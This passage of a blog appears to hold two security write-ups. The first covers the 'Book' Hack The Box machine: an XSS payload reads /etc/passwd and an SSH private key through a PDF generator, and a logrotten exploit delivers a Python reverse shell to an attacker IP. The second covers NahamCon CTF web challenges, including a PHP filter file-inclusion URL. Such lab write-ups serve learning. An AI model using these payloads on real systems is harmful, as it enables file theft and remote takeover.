<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">x</span><span class="o">=</span><span class="k">new</span> <span class="nx">XMLHttpRequest</span><span class="p">;</span><span class="nx">x</span><span class="p">.</span><span class="nx">onload</span><span class="o">=</span><span class="kd">function</span><span class="p">(){</span><span class="nb">document</span><span class="p">.</span><span class="nx">write</span><span class="p">(</span><span class="k">this</span><span class="p">.</span><span class="nx">responseText</span><span class="p">)};</span><span class="nx">x</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="dl">"</span><span class="s2">GET</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">file:///etc/passwd</span><span class="dl">"</span><span class="p">);</span><span class="nx">x</span><span class="p">.</span><span class="nx">send</span><span class="p">();</span><span class="o"><</span><span class="sr">/script</span><span class="err">>
</span></code></pre></div></div>
<p>After downloading the collections PDF we get /etc/passwd</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:GnatsBug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd NetworkManagement,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemdResolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
reader:x:1000:1000:reader:/home/reader:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
</code></pre></div></div>
<p>We can see there is a user called reader, we can try to get the SSH key for this user by modifying our payload slightly.</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">x</span><span class="o">=</span><span class="k">new</span> <span class="nx">XMLHttpRequest</span><span class="p">;</span><span class="nx">x</span><span class="p">.</span><span class="nx">onload</span><span class="o">=</span><span class="kd">function</span><span class="p">(){</span><span class="nb">document</span><span class="p">.</span><span class="nx">write</span><span class="p">(</span><span class="k">this</span><span class="p">.</span><span class="nx">responseText</span><span class="p">)};</span><span class="nx">x</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="dl">"</span><span class="s2">GET</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">file:///home/reader/.ssh/id_rsa</span><span class="dl">"</span><span class="p">);</span><span class="nx">x</span><span class="p">.</span><span class="nx">send</span><span class="p">();</span><span class="o"><</span><span class="sr">/script</span><span class="err">>
</span></code></pre></div></div>
<p>After downloading the collections PDF again we get an SSH key:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEA2JJQsccK6fE05OWbVGOuKZdf0FyicoUrrm821nHygmLgWSpJ
G8m6UNZyRGj77eeYGe/7YIQYPATNLSOpQIue3knhDiEsfR99rMg7FRnVCpiHPpJ0
WxtCK0VlQUwxZ6953D16uxlRH8LXeI6BNAIjF0Z7zgkzRhTYJpKs6M80NdjUCl/0
ePV8RKoYVWuVRb4nFG1Es0bOj29lu64yWd/j3xWXHgpaJciHKxeNlr8x6NgbPv4s
7WaZQ4cjd+yzpOCJw9J91Vi33gv6+KCIzr+TEfzI82+hLW1UGx/13fh20cZXA6PK
75I5d5Holg7ME40BU06Eq0E3EOY6whCPlzndVwIDAQABAoIBAQCs+kh7hihAbIi7
3mxvPeKok6BSsvqJD7aw72FUbNSusbzRWwXjrP8ke/Pukg/OmDETXmtgToFwxsD+
McKIrDvq/gVEnNiE47ckXxVZqDVR7jvvjVhkQGRcXWQfgHThhPWHJI+3iuQRwzUI
tIGcAaz3dTODgDO04Qc33+U9WeowqpOaqg9rWn00vgzOIjDgeGnbzr9ERdiuX6WJ
jhPHFI7usIxmgX8Q2/nx3LSUNeZ2vHK5PMxiyJSQLiCbTBI/DurhMelbFX50/owz
7Qd2hMSr7qJVdfCQjkmE3x/L37YQEnQph6lcPzvVGOEGQzkuu4ljFkYz6sZ8GMx6
GZYD7sW5AoGBAO89fhOZC8osdYwOAISAk1vjmW9ZSPLYsmTmk3A7jOwke0o8/4FL
E2vk2W5a9R6N5bEb9yvSt378snyrZGWpaIOWJADu+9xpZScZZ9imHHZiPlSNbc8/
ciqzwDZfSg5QLoe8CV/7sL2nKBRYBQVL6D8SBRPTIR+J/wHRtKt5PkxjAoGBAOe+
SRM/Abh5xub6zThrkIRnFgcYEf5CmVJX9IgPnwgWPHGcwUjKEH5pwpei6Sv8et7l
skGl3dh4M/2Tgl/gYPwUKI4ori5OMRWykGANbLAt+Diz9mA3FQIi26ickgD2fv+V
o5GVjWTOlfEj74k8hC6GjzWHna0pSlBEiAEF6Xt9AoGAZCDjdIZYhdxHsj9l/g7m
Hc5LOGww+NqzB0HtsUprN6YpJ7AR6+YlEcItMl/FOW2AFbkzoNbHT9GpTj5ZfacC
hBhBp1ZeeShvWobqjKUxQmbp2W975wKR4MdsihUlpInwf4S2k8J+fVHJl4IjT80u
Pb9n+p0hvtZ9sSA4so/DACsCgYEA1y1ERO6X9mZ8XTQ7IUwfIBFnzqZ27pOAMYkh
sMRwcd3TudpHTgLxVa91076cqw8AN78nyPTuDHVwMN+qisOYyfcdwQHc2XoY8YCf
tdBBP0Uv2dafya7bfuRG+USH/QTj3wVen2sxoox/hSxM2iyqv1iJ2LZXndVc/zLi
5bBLnzECgYEAlLiYGzP92qdmlKLLWS7nPM0YzhbN9q0qC3ztk/+1v8pjj162pnlW
y1K/LbqIV3C01ruxVBOV7ivUYrRkxR/u5QbS3WxOnK0FYjlS7UUAc4r0zMfWT9TN
nkeaf9obYKsrORVuKKVNFzrWeXcVx+oG3NisSABIprhDfKUSbHzLIR4=
-----END RSA PRIVATE KEY-----
</code></pre></div></div>
<p>We can now SSH in as reader@10.10.10.176.</p>
<p>We find User.txt in the home folder.</p>
<p><img src="https://jdmce.com/assets/book/reader.jpg" alt="Reader" /></p>
<h3 id="priv-esc">Priv Esc</h3>
<p>I start by running linPeas, which finds some interesting things</p>
<p><img src="https://jdmce.com/assets/book/linpeas.jpg" alt="linpeas" /></p>
<p>We see that this machine is vulnerable to Logrotate exploitation. We can write to the log files in the backups folder in reader’s home directory. Following the links from linPeas we get an exploit that we can use. <a href="https://github.com/whotwagner/logrotten">Logrotten</a>.</p>
<p>We transfer this to the target machine using wget. Then compile it:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>reader@book:~ gcc <span class="nt">-o</span> logrotten logrotten.c
</code></pre></div></div>
<p>Then we will need a payload, We can use a python reverse shell from <a href="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet">pentestmonkey</a>.</p>
<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">python</span> <span class="o">-</span><span class="n">c</span> <span class="s">'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.53",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</span>
</code></pre></div></div>
<p>Then set up a listener on the attacking machine.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nv <span class="nt">-lvnp</span> 9001
</code></pre></div></div>
<p>Then execute the exploit</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>reader@book:~ ./logrotten <span class="nt">-p</span> ./payloadfile /home/reader/backups/access.log
Waiting <span class="k">for </span>rotating backups/access.log...
</code></pre></div></div>
<p>If we now write random data to the log, it should trigger our payload.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">head</span> <span class="nt">-c</span> 10M < /dev/urandom <span class="o">></span> access.log
</code></pre></div></div>
<p>And we get a reverse shell!</p>
<p>I found the shell was very unstable so had to quickly cat root.txt before the shell dropped.</p>John McEwanBook is a medium difficulty machine on Hack the Box. As always we begin by running an nmap scan.Nahamcon CTF WriteUp2020-06-15T20:34:30+01:002020-06-15T20:34:30+01:00https://jdmce.com/ctf%20writeups/NahamCon-CTF-Writeup<p><a href="https://ctf.nahamcon.com/">Nahamcon CTF</a> was an online CTF even held on June 12th-13th. Unfortunately I was only able to dedicate a few hours so I focused on the easier challenges.</p>
<h2 id="web">Web</h2>
<h3 id="agent-95">Agent 95</h3>
<ul>
<li>Clue: They’ve given you a number, and taken away your name~</li>
<li>Points: 50</li>
<li>Solves: 1788</li>
</ul>
<p>The Web page gives us the following message:</p>
<blockquote>
<p>You don’t look like our agent!
We will only give our flag to our Agent 95! He is still running an old version of Windows…</p>
</blockquote>
<p>I used BurpSuite to change the User agent to <code class="language-plaintext highlighter-rouge">Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)</code> which I got from <a href="http://useragentstring.com/pages/useragentstring.php?name=Internet+Explorer">useragentstring.com</a>. The response is the flag.</p>
<hr />
<h3 id="localghost">Localghost</h3>
<ul>
<li>Clue: BooOooOooOOoo! This spooOoOooky client-side cooOoOode sure is scary! What spoOoOoOoky secrets does he have in stooOoOoOore??</li>
<li>Points: 75</li>
<li>Solves: 1375</li>
</ul>
<p><img src="https://jdmce.com/assets/Nahamconctf/localghost.jpg" alt="Ascii Ghost" /></p>
<p>The web page has an ascii art ghost, which scrolls infinitely. By looking at the source code we find that the infinite scrolling is done using javascript /jquery.jscroll2.js.</p>
<p>The javascript is obfuscated</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">_0xbcec</span><span class="o">=</span><span class="p">[</span><span class="dl">"</span><span class="se">\</span><span class="s2">x75</span><span class="se">\</span><span class="s2">x73</span><span class="se">\</span><span class="s2">x65</span><span class="se">\</span><span class="s2">x20</span><span class="se">\</span><span class="s2">x73</span><span class="se">\</span><span class="s2">x74</span><span class="se">\</span><span class="s2">x72</span><span class="se">\</span><span class="s2">x69</span><span class="se">\</span><span class="s2">x63</span><span class="se">\</span><span class="s2">x74</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x6A</span><span class="se">\</span><span class="s2">x73</span><span class="se">\</span><span class="s2">x63</span><span class="se">\</span><span class="s2">x72</span><span class="se">\</span><span class="s2">x6F</span><span class="se">\</span><span class="s2">x6C</span><span class="se">\</span><span class="s2">x6C</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x3C</span><span class="se">\</span><span class="s2">x73</span><span class="se">\</span><span class="s2">x6D</span><span class="se">\</span><span class="s2">x61</span><span class="se">\</span><span class="s2">x6C</span><span class="se">\</span><span class="s2">x6C</span><span class="se">\</span><span class="s2">x3E</span><span class="se">\</span><span class="s2">x4C</span><span class="se">\</span><span class="s2">x6F</span><span class="se">\</span><span class="s2">x61</span><span class="se">\</span><span class="s2">x64</span><span class="se">\</span><span class="s2">x69</span><span class="se">\</span><span class="s2">x6E</span><span class="se">\</span><span class="s2">x67</span><span class="se">\</span><span class="s2">x2E</span><span class="se">\</span><span class="s2">x2E</span><span class="se">\</span><span class="s2">x2E</span><span class="se">\</span><span class="s2">x3C</span><span class="se">\</span><span class="s2">x2F</span><span class="se">\</span><span class="s2">x73</span><span class="se">\</span><span class="s2">x6D</span><span class="se">\</span><span class="s2">x61</span><span class="se">\</span><span class="s2">x6C</span><span class="se">\</span><span class="s2">x6C</span><span class="se">\</span><span class="s2">x3E</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x61</span><span class="se">\</span><span class="s2">x3A</span><span class="se">\</span><span class="s2">x6C</span><span class="se">\</span><span class="s2">x61</span><span class="se">\</span><span class="s2">x73</span><span class="se">\</span><span class="s2">x74</span><span class="dl">"</span><span class="p">,</span><span class="dl">""</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x66</span><span class="se">\</span><span class="s2">x6C</span><span class="se">\</span><span class="s2">x61</span><span class="se">\</span><span class="s2">x67</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x53</span><span class="se">\</span><span class="s2">x6B</span><span class="se">\</span><span class="s2">x4E</span><span class="se">\</span><span class="s2">x55</span><span class="se">\</span><span class="s2">x52</span><span class="se">\</span><span class="s2">x6E</span><span class="se">\</span><span class="s2">x74</span><span class="se">\</span><span class="s2">x7A</span><span class="se">\</span><span class="s2">x63</span><span class="se">\</span><span class="s2">x47</span><span class="se">\</span><span class="s2">x39</span><span class="se">\</span><span class="s2">x76</span><span class="se">\</span><span class="s2">x62</span><span class="se">\</span><span class="s2">x32</span><span class="se">\</span><span class="s2">x39</span><span class="se">\</span><span class="s2">x76</span><span class="se">\</span><span class="s2">x61</span><span class="se">\</span><span class="s2">x33</span><span class="se">\</span><span class="s2">x6C</span><span class="se">\</span><span class="s2">x66</span><span class="se">\</span><span class="s2">x5A</span><span class="se">\</span><span class="s2">x32</span><span class="se">\</span><span class="s2">x68</span><span class="se">\</span><span class="s2">x76</span><span class="se">\</span><span class="s2">x63</span><span class="se">\</span><span class="s2">x33</span><span class="se">\</span><span class="s2">x52</span><span class="se">\</span><span class="s2">x7A</span><span class="se">\</span><span class="s2">x58</span><span class="se">\</span><span class="s2">x32</span><span class="se">\</span><span class="s2">x6C</span><span class="se">\</span><span class="s2">x75</span><span class="se">\</span><span class="s2">x58</span><span class="se">\</span><span class="s2">x33</span><span class="se">\</span><span class="s2">x4E</span><span class="se">\</span><span class="s2">x30</span><span class="se">\</span><span class="s2">x62</span><span class="se">\</span><span class="s2">x33</span><span class="se">\</span><span class="s2">x4A</span><span class="se">\</span><span class="s2">x68</span><span class="se">\</span><span class="s2">x5A</span><span class="se">\</span><span class="s2">x32</span><span class="se">\</span><span class="s2">x56</span><span class="se">\</span><span class="s2">x39</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x73</span><span class="se">\</span><span class="s2">x65</span><span class="se">\</span><span class="s2">x74</span><span class="se">\</span><span class="s2">x49</span><span class="se">\</span><span class="s2">x74</span><span class="se">\</span><span class="s2">x65</span><span class="se">\</span><span class="s2">x6D</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x6C</span><span class="se">\</span><span class="s2">x6F</span><span class="se">\</span><span class="s2">x63</span><span class="se">\</span><span class="s2">x61</span><span class="se">\</span><span class="s2">x6C</span><span class="se">\</span><span class="s2">x53</span><span class="se">\</span><span class="s2">x74</span><span class="se">\</span><span class="s2">x6F</span><span class="se">\</span><span class="s2">x72</span><span class="se">\</span><span class="s2">x61</span><span class="se">\</span><span class="s2">x67</span><span class="se">\</span><span class="s2">x65</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x64</span><span class="se">\</span><span class="s2">x61</span><span class="se">\</span><span class="s2">x74</span><span class="se">\</span><span class="s2">x61</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x66</span><span class="se">\</span><span class="s2">x75</span><span class="se">\</span><span class="s2">x6E</span><span class="se">\</span><span class="s2">x63</span><span class="se">\</span><span class="s2">x74</span><span class="se">\</span><span class="s2">x69</span><span class="se">\</span><span class="s2">x6F</span><span class="se">\</span><span class="s2">x6E</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x64</span><span class="se">\</span><span class="s2">x65</span><span class="se">\</span><span class="s2">x66</span><span class="se">\</span><span class="s2">x61</span><span class="se">\</span><span class="s2">x75</span><span class="se">\</span><span class="s2">x6C</span><span class="se">\</span><span class="s2">x74</span><span class="se">\</span><span class="s2">x73</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x65</span><span class="se">\</span><span class="s2">x78</span><span class="se">\</span><span class="s2">x74</span><span class="se">\</span><span class="s2">x65</span><span class="se">\</span><span class="s2">x6E</span><span class="se">\</span><span class="s2">x64</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x6F</span><span class="se">\</span><span class="s2">x76</span><span class="se">\</span><span class="s2">x65</span><span class="se">\</span><span class="s2">x72</span><span class="se">\</span><span class="s2">x66</span><span class="se">\</span><span class="s2">x6C</span><span class="se">\</span><span class="s2">x6F</span><span class="se">\</span><span class="s2">x77</span><span class="se">\</span><span class="s2">x2D</span><span class="se">\</span><span class="s2">x79</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x63</span><span class="se">\</span><span class="s2">x73</span><span class="se">\</span><span class="s2">x73</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x76</span><span class="se">\</span><span class="s2">x69</span><span class="se">\</span><span class="s2">x73</span><span class="se">\</span><span class="s2">x69</span><span class="se">\</span><span class="s2">x62</span><span class="se">\</span><span class="s2">x6C</span><span class="se">\</span><span class="s2">x65</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x66</span><span class="se">\</span><span class="s2">x69</span><span class="se">\</span><span class="s2">x72</span><span class="se">\</span><span class="s2">x73</span><span class="se">\</span><span class="s2">x74</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x6E</span><span class="se">\</span><span class="s2">x65</span><span class="se">\</span><span class="s2">x78</span><span class="se">\</span><span class="s2">x74</span><span class="se">\</span><span class="s2">x53</span><span class="se">\</span><span class="s2">x65</span><span class="se">\</span><span class="s2">x6C</span><span class="se">\</span><span class="s2">x65</span><span class="se">\</span><span class="s2">x63</span><span class="se">\</span><span class="s2">x74</span><span class="se">\</span><span class="s2">x6F</span><span class="se">\</span><span class="s2">x72</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x66</span><span class="se">\</span><span class="s2">x69</span><span class="se">\</span><span class="s2">x6E</span><span class="se">\</span><span class="s2">x64</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x62</span><span class="se">\</span><span class="s2">x6F</span><span class="se">\</span><span class="s2">x64</span><span class="se">\</span><span class="s2">x79</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x68</span><span class="se">\</span><span class="s2">x72</span><span class="se">\</span><span class="s2">x65</span><span class="se">\</span><span class="s2">x66</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x61</span><span class="se">\</span><span class="s2">x74</span><span class="se">\</span><span class="s2">x74</span><span class="se">\</span><span class="s2">x72</span><span class="dl">"</span><span class="p">,</span>
<span class="p">...</span>
</code></pre></div></div>
<p>I used <a href="https://beautifier.io/">beautifier.io</a> to de-obfuscate the code.</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">_0xe943x1</span><span class="p">)</span> <span class="p">{</span>
<span class="dl">'</span><span class="s1">use strict</span><span class="dl">'</span><span class="p">;</span>
<span class="nx">_0xe943x1</span><span class="p">[</span><span class="dl">'</span><span class="s1">jscroll</span><span class="dl">'</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span>
<span class="na">defaults</span><span class="p">:</span> <span class="p">{</span>
<span class="na">debug</span><span class="p">:</span> <span class="kc">false</span><span class="p">,</span>
<span class="na">autoTrigger</span><span class="p">:</span> <span class="kc">true</span><span class="p">,</span>
<span class="na">autoTriggerUntil</span><span class="p">:</span> <span class="kc">false</span><span class="p">,</span>
<span class="na">loadingHtml</span><span class="p">:</span> <span class="dl">'</span><span class="s1"><small>Loading...</small></span><span class="dl">'</span><span class="p">,</span>
<span class="na">padding</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="na">nextSelector</span><span class="p">:</span> <span class="dl">'</span><span class="s1">a:last</span><span class="dl">'</span><span class="p">,</span>
<span class="na">contentSelector</span><span class="p">:</span> <span class="dl">''</span><span class="p">,</span>
<span class="na">pagingSelector</span><span class="p">:</span> <span class="dl">''</span><span class="p">,</span>
<span class="na">callback</span><span class="p">:</span> <span class="kc">false</span>
<span class="p">}</span>
<span class="p">};</span>
<span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">localStorage</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">setItem</span><span class="dl">'</span><span class="p">](</span><span class="dl">'</span><span class="s1">flag</span><span class="dl">'</span><span class="p">,</span> <span class="nx">atob</span><span class="p">(</span><span class="dl">'</span><span class="s1">SkNURntzcG9vb29va3lfZ2hvc3RzX2luX3N0b3JhZ2V9</span><span class="dl">'</span><span class="p">));</span>
<span class="kd">var</span> <span class="nx">_0xe943x2</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">_0xe943x3</span><span class="p">,</span> <span class="nx">_0xe943x4</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">_0xe943x5</span> <span class="o">=</span> <span class="nx">_0xe943x3</span><span class="p">[</span><span class="dl">'</span><span class="s1">data</span><span class="dl">'</span><span class="p">](</span><span class="dl">'</span><span class="s1">jscroll</span><span class="dl">'</span><span class="p">),</span>
<span class="nx">_0xe943x6</span> <span class="o">=</span> <span class="p">(</span><span class="k">typeof</span> <span class="nx">_0xe943x4</span> <span class="o">===</span> <span class="dl">'</span><span class="s1">function</span><span class="dl">'</span><span class="p">)</span> <span class="p">?</span> <span class="p">{</span>
<span class="na">callback</span><span class="p">:</span> <span class="nx">_0xe943x4</span>
<span class="p">}</span> <span class="p">:</span> <span class="nx">_0xe943x4</span><span class="p">,</span>
<span class="nx">_0xe943x7</span> <span class="o">=</span> <span class="nx">_0xe943x1</span><span class="p">[</span><span class="dl">'</span><span class="s1">extend</span><span class="dl">'</span><span class="p">]({},</span> <span class="nx">_0xe943x1</span><span class="p">[</span><span class="dl">'</span><span class="s1">jscroll</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">defaults</span><span class="dl">'</span><span class="p">],</span> <span class="nx">_0xe943x6</span><span class="p">,</span> <span class="nx">_0xe943x5</span> <span class="o">||</span> <span class="p">{}),</span>
<span class="nx">_0xe943x8</span> <span class="o">=</span> <span class="p">(</span><span class="nx">_0xe943x3</span><span class="p">[</span><span class="dl">'</span><span class="s1">css</span><span class="dl">'</span><span class="p">](</span><span class="dl">'</span><span class="s1">overflow-y</span><span class="dl">'</span><span class="p">)</span> <span class="o">===</span> <span class="dl">'</span><span class="s1">visible</span><span class="dl">'</span><span class="p">),</span>
<span class="nx">_0xe943x9</span> <span class="o">=</span> <span class="nx">_0xe943x3</span><span class="p">[</span><span class="dl">'</span><span class="s1">find</span><span class="dl">'</span><span class="p">](</span><span class="nx">_0xe943x7</span><span class="p">[</span><span class="dl">'</span><span class="s1">nextSelector</span><span class="dl">'</span><span class="p">])[</span><span class="dl">'</span><span class="s1">first</span><span class="dl">'</span><span class="p">](),</span>
<span class="nx">_0xe943xa</span> <span class="o">=</span> <span class="nx">_0xe943x1</span><span class="p">(</span><span class="nb">window</span><span class="p">),</span>
<span class="nx">_0xe943xb</span> <span class="o">=</span> <span class="nx">_0xe943x1</span><span class="p">(</span><span class="dl">'</span><span class="s1">body</span><span class="dl">'</span><span class="p">),</span>
<span class="nx">_0xe943xc</span> <span class="o">=</span> <span class="nx">_0xe943x8</span> <span class="p">?</span> <span class="nx">_0xe943xa</span> <span class="p">:</span> <span class="nx">_0xe943x3</span><span class="p">,</span>
<span class="nx">_0xe943xd</span> <span class="o">=</span> <span class="nx">_0xe943x1</span><span class="p">[</span><span class="dl">'</span><span class="s1">trim</span><span class="dl">'</span><span class="p">](</span><span class="nx">_0xe943x9</span><span class="p">[</span><span class="dl">'</span><span class="s1">attr</span><span class="dl">'</span><span class="p">](</span><span class="dl">'</span><span class="s1">href</span><span class="dl">'</span><span class="p">)</span> <span class="o">+</span> <span class="dl">'</span><span class="s1"> </span><span class="dl">'</span> <span class="o">+</span> <span class="nx">_0xe943x7</span><span class="p">[</span><span class="dl">'</span><span class="s1">contentSelector</span><span class="dl">'</span><span class="p">]),</span>
<span class="nx">_0xe943xe</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">_0xe943x17</span> <span class="o">=</span> <span class="nx">_0xe943x1</span><span class="p">(</span><span class="nx">_0xe943x7</span><span class="p">[</span><span class="dl">'</span><span class="s1">loadingHtml</span><span class="dl">'</span><span class="p">])[</span><span class="dl">'</span><span class="s1">filter</span><span class="dl">'</span><span class="p">](</span><span class="dl">'</span><span class="s1">img</span><span class="dl">'</span><span class="p">)[</span><span class="dl">'</span><span class="s1">attr</span><span class="dl">'</span><span class="p">](</span><span class="dl">'</span><span class="s1">src</span><span class="dl">'</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">_0xe943x17</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">_0xe943x18</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">Image</span><span class="p">();</span>
<span class="nx">_0xe943x18</span><span class="p">[</span><span class="dl">'</span><span class="s1">src</span><span class="dl">'</span><span class="p">]</span> <span class="o">=</span> <span class="nx">_0xe943x17</span>
<span class="p">}</span>
<span class="p">},</span>
<span class="p">...</span>
</code></pre></div></div>
<p>The code sets the item “flag” to the string <code class="language-plaintext highlighter-rouge">SkNURntzcG9vb29va3lfZ2hvc3RzX2luX3N0b3JhZ2V9</code> if we base64 decode this string we get the flag.</p>
<p>Another way to solve this challenge is to simply use chrome dev tools, where the flag is stored in Local Storage.</p>
<p class="full"><img src="https://jdmce.com/assets/Nahamconctf/localflag.jpg" alt="Local Ghost" /></p>
<hr />
<h3 id="phphonebook">PhphoneBook</h3>
<ul>
<li>Clue: Ring ring! Need to look up a number? This phonebook has got you covered! But you will only get a flag if it is an emergency!</li>
<li>Points: 100</li>
<li>Solves: 561</li>
</ul>
<p>The web page gives us the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Sorry! You are in /index.php/?file=
The phonebook is located at phphonebook.php
</code></pre></div></div>
<p>I first tried going directly to phphonebook.php and got the following page:</p>
<p><img src="https://jdmce.com/assets/Nahamconctf/phonebook.jpg" alt="phphonebook" /></p>
<p>I then tried going to /index.php/?file=phphonebook.php and got the same page. I realised quickly that it was a local file inclusion, but spent too long trying to look for other files, like a flag.php, which doesn’t exist.</p>
<p>Eventually I realised / remembered that I might be able to get the contents of phphonebook.php by using base64 encoding.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://jh2i.com:50002/index.php?file=php://filter/convert.base64-encode/resource=phphonebook.php
</code></pre></div></div>
<p>It works! This gives us the contents of phphonebook.php encoded in base64.</p>
<p>Decoding it gives us the following code:</p>
<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp"><!DOCTYPE html></span>
<span class="nt"><html</span> <span class="na">lang=</span><span class="s">"en"</span><span class="nt">></span>
<span class="nt"><head></span>
<span class="nt"><meta</span> <span class="na">charset=</span><span class="s">"utf-8"</span><span class="nt">></span>
<span class="nt"><title></span>Phphonebook<span class="nt"></title></span>
<span class="nt"><link</span> <span class="na">href=</span><span class="s">"main.css"</span> <span class="na">rel=</span><span class="s">"stylesheet"</span><span class="nt">></span>
<span class="nt"></head></span>
<span class="nt"><body</span> <span class="na">class=</span><span class="s">"bg"</span><span class="nt">></span>
<span class="nt"><h1</span> <span class="na">id=</span><span class="s">"header"</span><span class="nt">></span> Welcome to the Phphonebook <span class="nt"></h1></span>
<span class="nt"><div</span> <span class="na">id=</span><span class="s">"im_container"</span><span class="nt">></span>
<span class="nt"><img</span> <span class="na">src=</span><span class="s">"book.jpg"</span> <span class="na">width=</span><span class="s">"50%"</span> <span class="na">height=</span><span class="s">"30%"</span><span class="nt">/></span>
<span class="nt"><p</span> <span class="na">class=</span><span class="s">"desc"</span><span class="nt">></span>
This phphonebook was made to look up all sorts of numbers! Have fun...
<span class="nt"></p></span>
<span class="nt"></div></span>
<span class="nt"><br></span>
<span class="nt"><br></span>
